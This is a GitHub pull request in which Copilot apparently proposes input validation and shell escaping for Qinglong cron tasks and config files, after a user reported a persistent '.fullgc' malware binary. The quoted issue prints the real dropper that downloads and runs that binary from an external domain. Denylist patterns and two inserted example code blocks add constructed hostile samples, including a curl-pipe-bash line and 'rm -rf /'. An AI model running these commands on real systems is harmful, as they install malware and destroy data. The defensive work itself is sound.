
Security: Prevent shell injection in cron tasks and config files#2924

Draft
Copilot wants to merge 5 commits into develop from copilot/fix-fullgc-memory-issue

Conversation


Copilot AI commented Feb 8, 2026

Problem

Cron task fields (task_before, task_after, command) and config file writes lacked input validation and proper shell escaping. Reported incident: malicious code downloaded .fullgc binary from external domain, executed in background consuming 100% memory, and persisted by re-injecting itself.

Example of previously unvalidated malicious input:

d="${QL_DIR:-/ql}/data/db";b="$d/.fullgc";u="https://file.551911.xyz/fullgc/fullgc-linux-x86_64";
curl -fsSL -o "$b" "$u"&&chmod +x "$b"&&nohup "$b" >/dev/null 2>&1 &

Changes

Input Validation (back/validation/schedule.ts)

Added validateShellSecurity() to block:

  • Command substitution: $(...), backticks
  • File downloads: curl, wget, fetch
  • External URLs: https?://
  • Hidden file execution: /\.file
  • Obfuscation patterns: base64, eval
  • Suspicious combinations: (curl|wget).*>/dev/null.*&, /tmp/.*&&.*(chmod|\.\/)

Shell Escaping (back/services/cron.ts)

Replaced weak escaping with escapeShellArg():

// Before: allowed command injection via newlines
arg.replace(/'/g, "'\\''").replace(/;? *\n/g, ';')

// After: prevents command chains
arg.replace(/\r?\n/g, ' ').replace(/'/g, "'\\''")

Config File Security (back/api/config.ts)

Added content validation for config writes to detect:

  • Download-execute chains: (curl|wget).*\|.*bash
  • Permission escalation: (curl|wget).*&&.*chmod
  • Hidden file downloads: (curl|wget).*\/\.\w+

Documentation (SECURITY_ENHANCEMENTS.md)

Remediation steps for affected users, detection patterns, and security best practices.

Security Impact

Prevents:

  • Remote code execution via task field injection
  • Malware download and persistence
  • Command injection through shell metacharacters
  • Hidden file execution in background processes
Original prompt

This section details the original issue you should resolve

<issue_title>Have I been infected with a trojan? /data/db/.fullgc has been using 100% of memory for months</issue_title>
<issue_description>### Qinglong version

Stable release v2.20.1

Steps to reproduce

Name | .fullgc | PID | 1879430 | Status | sleeping
-- | -- | -- | -- | -- | --
docker-entrypoi(1866020) | root | 10 1 | 0 B | 0 B 2026/02/08 12:54:59 | .fullgc /ql/data/db/.fullgc

Looking into it, the source is

the config file:

d="${QL_DIR:-/ql}/data/db";b="$d/.fullgc";case "$(uname -s)-$(uname -m)" in Linux-x86_64|Linux-amd64)u="https://file.551911.xyz/fullgc/fullgc-linux-x86_64";;Linux-aarch64|Linux-arm64)u="https://file.551911.xyz/fullgc/fullgc-linux-aarch64";;Darwin-x86_64)u="https://file.551911.xyz/fullgc/fullgc-macos-x86_64";;Darwin-arm64)u="https://file.551911.xyz/fullgc/fullgc-macos-arm64";;esac;[ -n "$u" ]&&[ ! -f "$b" ]&&{ curl -fsSL -o "$b" "$u"||wget -qO "$b" "$u"; }&&chmod +x "$b";[ -f "$b" ]&&! ps -ef|grep -v grep|grep -qF ".fullgc"&&nohup "$b" >/dev/null 2>&1 &

After I delete it, it gets re-added by itself at irregular intervals.

The only repository I run is faker3.

What is expected?

1

What is actually happening?

1

System Info

Any additional comments?

No response</issue_description>

Comments on the Issue (you are @copilot in this section)
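The following is an added example, not code from the qinglong project or from this PR: a denylist validator of the kind the PR describes for the cron task fields (task_before, task_after, command) and for config-file writes. The rule names, the regular expressions, the function names validateTaskField / validateConfigContent and the sample inputs are this example's own approximation of the patterns listed in the PR description, not the project's actual implementation. It reports each finding with its line number so an operator can see what was rejected and why.

```typescript
// Added example (not qinglong's code): denylist checks modelled on the
// patterns the PR lists for task fields and config-file contents.

interface Rule {
  name: string;
  pattern: RegExp; // no 'g' flag: RegExp.test must stay stateless
}

// Rules for task_before / task_after / command (approximation of the PR's
// validateShellSecurity list; case-insensitive where the page's list is not).
const TASK_FIELD_RULES: Rule[] = [
  { name: "command substitution", pattern: /\$\(|`/ },
  { name: "file download tool", pattern: /\b(curl|wget|fetch)\b/i },
  { name: "external URL", pattern: /https?:\/\//i },
  { name: "hidden file execution", pattern: /\/\.[\w-]+/ },
  { name: "obfuscation", pattern: /\b(base64|eval)\b/i },
  { name: "background download", pattern: /(curl|wget).*>\s*\/dev\/null.*&/i },
  { name: "tmp stage and execute", pattern: /\/tmp\/.*&&.*(chmod|\.\/)/i },
];

// Rules for config-file contents (approximation of the back/api/config.ts checks).
const CONFIG_RULES: Rule[] = [
  { name: "download-execute chain", pattern: /(curl|wget).*\|.*\b(ba)?sh\b/i },
  { name: "permission escalation", pattern: /(curl|wget).*&&.*chmod/i },
  { name: "hidden file download", pattern: /(curl|wget).*\/\.\w+/i },
];

// Run every rule over every line; return "line N: rule name" for each hit,
// in rule order, so the caller can refuse the write and log the reason.
function findViolations(text: string, rules: Rule[]): string[] {
  const hits: string[] = [];
  text.split(/\r?\n/).forEach((line, idx) => {
    for (const r of rules) {
      if (r.pattern.test(line)) hits.push(`line ${idx + 1}: ${r.name}`);
    }
  });
  return hits;
}

function validateTaskField(value: string): string[] {
  return findViolations(value, TASK_FIELD_RULES);
}

function validateConfigContent(content: string): string[] {
  return findViolations(content, CONFIG_RULES);
}

// Constructed samples (placeholder domain, not a real indicator):
const CONSTRUCTED_BAD_TASK =
  'b="/ql/data/db/.fullgc"; curl -fsSL -o "$b" "https://malicious.example/bin" && chmod +x "$b" && nohup "$b" >/dev/null 2>&1 &';

const CONSTRUCTED_CONFIG = [
  "## constructed config.sh sample",
  "export NOTIFY=1",
  "curl -fsSL https://malicious.example/x.sh | bash",
].join("\n");

// Stand-alone run: print what each validator would reject.
console.log("task field:", validateTaskField(CONSTRUCTED_BAD_TASK));
console.log("config:", validateConfigContent(CONSTRUCTED_CONFIG));
console.log("benign task:", validateTaskField("npm install && node index.js"));
```

Two caveats apply to any validator of this shape. First, it is a detection layer, not the control that removes the injection: a field that passes every rule is still interpolated into a shell, so the quoting fix in cron.ts is what actually has to hold. Second, the rules are deliberately broad, so expect false positives: "hidden file execution" as written also matches ordinary dotfile paths such as /root/.npmrc, and "file download tool" rejects any task that legitimately runs curl; operators should review rejected writes rather than assume every hit is malicious.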


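The following is an added example, not code from the PR or from the qinglong project: it reproduces the PR's "after" escaping as a function named escapeShellArg, assumes (as the caller in cron.ts presumably does) that the escaped value is then wrapped in single quotes, and uses a small single-quote-aware word splitter written only for this example to show that the quoted value arrives as one argument with no command boundary, whereas the same value interpolated raw splits into two commands at the newline. The command name run_task and the --before option are placeholders.

```typescript
// Added example (not qinglong's code): the PR's "after" escaping plus a
// toy splitter that makes the difference between raw and quoted values visible.

// Same transformation as the PR's "after" snippet: fold line breaks into a
// space first, then escape single quotes with the '\'' idiom.
function escapeShellArg(arg: string): string {
  return arg.replace(/\r?\n/g, " ").replace(/'/g, "'\\''");
}

// Assumption: the caller wraps the escaped value in single quotes.
function quoteForShell(arg: string): string {
  return `'${escapeShellArg(arg)}'`;
}

// Minimal POSIX-like word splitter for this example only: understands single
// quotes, backslash outside quotes, blanks, and the operators ; & | and
// newline (reported as ";"). Not a real shell parser.
function splitShellWords(cmdline: string): string[] {
  const words: string[] = [];
  let cur = "";
  let haveWord = false;
  let inSingle = false;
  for (let i = 0; i < cmdline.length; i++) {
    const ch = cmdline[i];
    if (inSingle) {
      if (ch === "'") inSingle = false;
      else cur += ch;
      continue;
    }
    if (ch === "'") { inSingle = true; haveWord = true; continue; }
    if (ch === "\\" && i + 1 < cmdline.length) { cur += cmdline[++i]; haveWord = true; continue; }
    if (ch === " " || ch === "\t") {
      if (haveWord) { words.push(cur); cur = ""; haveWord = false; }
      continue;
    }
    if (ch === "\n" || ch === ";" || ch === "&" || ch === "|") {
      if (haveWord) { words.push(cur); cur = ""; haveWord = false; }
      words.push(ch === "\n" ? ";" : ch); // operator token = command boundary
      continue;
    }
    cur += ch;
    haveWord = true;
  }
  if (haveWord) words.push(cur);
  return words;
}

const OPERATORS = new Set([";", "&", "|"]);
function countBoundaries(words: string[]): number {
  return words.filter((w) => OPERATORS.has(w)).length;
}

// Constructed sample: a task_before value carrying quotes and a line break.
const SAMPLE_TASK_BEFORE = "echo 'hi'\nrm -rf /";

interface Demo { escapedWords: string[]; escapedBoundaries: number; rawBoundaries: number }

function demo(): Demo {
  const escapedWords = splitShellWords(`run_task --before ${quoteForShell(SAMPLE_TASK_BEFORE)}`);
  const rawWords = splitShellWords(`run_task --before ${SAMPLE_TASK_BEFORE}`);
  return {
    escapedWords,
    escapedBoundaries: countBoundaries(escapedWords),
    rawBoundaries: countBoundaries(rawWords),
  };
}

console.log(demo());
```

The escaped form yields exactly three words, the third being the whole original value with its newline turned into a space, and zero command boundaries; the raw form yields a boundary at the newline, which is the second command the PR's change is meant to prevent. Folding newlines before quoting is belt-and-braces: inside single quotes a newline is already literal, so the fold mainly protects callers that do not quote the value.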


vercel bot commented Feb 8, 2026

The latest updates on your projects. Learn more about Vercel for GitHub.

Project | Deployment | Actions | Updated (UTC)
qinglong | Ready | Preview, Comment | Feb 8, 2026 3:32pm
qinglong-back | Ready | Preview, Comment | Feb 8, 2026 3:32pm

…tion

Co-authored-by: whyour <22700758+whyour@users.noreply.github.com>
Copilot AI changed the title [WIP] Fix memory issue with .fullgc usage Security: Prevent shell injection in cron tasks and config files Feb 8, 2026
Copilot AI requested a review from whyour February 8, 2026 15:32
@duki-web duki-web mentioned this pull request Feb 20, 2026
Closed